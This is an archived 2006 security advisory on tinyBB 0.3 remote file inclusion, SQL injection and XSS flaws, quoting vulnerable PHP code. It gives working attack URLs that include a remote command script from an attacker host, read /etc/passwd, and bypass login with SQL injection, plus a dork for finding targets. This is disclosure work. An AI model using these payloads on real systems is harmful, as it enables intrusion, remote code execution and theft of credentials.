[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.

To: submit@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, egg@xxxxxxxxxxxxxxxxxxxxxxxxxxxxx, dot@xxxxxxxxxx, co@xxxxxxxxxx, "uk."@nukedx.com
Subject: Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
From: Mustafa Can Bjorn IPEKCI <nukedx@xxxxxxxxxx>
Date: Sun, 28 May 2006 16:57:23 +0300

--Security Report--
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:37 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.

About: Via this methods remote attacker can include arbitrary files totinyBB.tinybb_footers variable infooters.php did not sanitized before using it.You can find vulnerablecode in footers.php at line 3

-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability so easy turn off register_globals.

There is also SQL injection in forgot.php.Parameter $q did notsanitized properly before using it on SQL query.

You can find vulnerable codes in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {

4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' ORemail='$q'";

5: $count = mysql_result(mysql_query($sql),0);
.....
-End of source-

Also this can be caused to XSS.You can find vulnerable code inforgot.php at line 19-21

-Source in forgot.php-
19:  else {
20:    echo "<p>The query <b>$q</b> could not be .....
21:  }
-End of source-

There is another SQL injection in login.php.Parameters username andpassword did not sanitized properly before using

it on SQL query.You can find vulnerable codes in login.php at line 2-8
-Source in login.php-

8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' ANDusername='$username' AND password='$password'";

-End of source-

I didnt wrote all vulnerabilities on tinyBB there is too many SQLinjections and XSS vulnerabilities on this tiny

bulletin board.
Level: Highly Critical
---
How&Example:
Succesful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript

EXAMPLE ->http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

If magic_quotes_gpc off remote attacker can include local files too
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php

GET ->http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing

---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=33
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
---
Dorks: "Powered by tinyBB"

Prev by Date: Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability
Next by Date: Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Previous by thread: Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability
Next by thread: Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Index(es):
- Date
- Thread